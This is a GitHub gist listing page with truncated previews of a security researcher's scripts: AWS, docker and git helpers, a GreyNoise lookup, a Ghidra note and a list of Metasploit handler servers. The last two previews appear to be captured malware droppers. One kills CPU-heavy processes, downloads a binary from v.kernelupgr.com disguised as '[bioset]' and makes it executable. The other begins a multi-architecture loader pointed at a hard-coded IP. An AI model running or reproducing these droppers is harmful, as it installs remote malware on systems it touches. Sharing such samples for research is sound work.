Skip to content

Instantly share code, notes, and snippets.

Remco Verhoef nl5887

Block or report user

Report or block nl5887

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@nl5887
nl5887 / spotty.sh
Last active Jan 13, 2020
View spotty.sh
#!/usr/bin/env bash
AWS_CLI="aws --region $AWS_REGION"
PRICE=0.2
USER_NAME=#USERNAME#
KEY_NAME=#KEY NAME#
SECURITY_GROUP_ID=#SECURITY GROUP#
SUBNET_ID=#SUBNET#
VOLUME_SIZE=40
INSTANCE_TYPE=t2.2xlarge
@nl5887
nl5887 / start.sh
Last active Sep 12, 2019
Start docker tkiv cluster
View start.sh
export DATADIR=$(pwd)/tkiv-data/
for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
docker stop $s
docker rm $s
done
#ifconfig lo0 alias 192.168.1.101
#ifconfig lo0 alias 192.168.1.102
#ifconfig lo0 alias 192.168.1.103
@nl5887
nl5887 / precommit
Last active Aug 28, 2019
Git pre-commit script that will validate build
View precommit
#!/bin/bash
set -e
DEST=$(mktemp -d)
SRC=$(pwd)
pushd .
cd $DEST; git clone $SRC/.git . >/dev/null 2>&1
cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null
@nl5887
nl5887 / dockerize.sh
Created Aug 18, 2019
Docker build script that will only use git added files to container volume
View dockerize.sh
#!/bin/bash
DEST=$(mktemp -d)
SRC=$(pwd)
echo "Cloning $SRC into $DEST"
pushd .
cd $DEST
git clone $SRC/.git .
@nl5887
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
end
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end
@nl5887
nl5887 / 001_readme.md
Last active Dec 16, 2019
Metasploit Meterpreter handler servers (HTTP/HTTPS)
View 001_readme.md

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to censys.io and Jose.

@nl5887
nl5887 / 000_readme.md
Created Mar 7, 2019
View 000_readme.md
@nl5887
nl5887 / 00_readme.md
Last active Oct 7, 2019
Ghidra decompile
View 00_readme.md

Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
@nl5887
nl5887 / all
Last active Mar 1, 2019
View all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
@nl5887
nl5887 / a
Created Feb 26, 2019
View a
#!/bin/sh
# Edit
WEBSERVER="209.141.50.26"
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
You can’t perform that action at this time.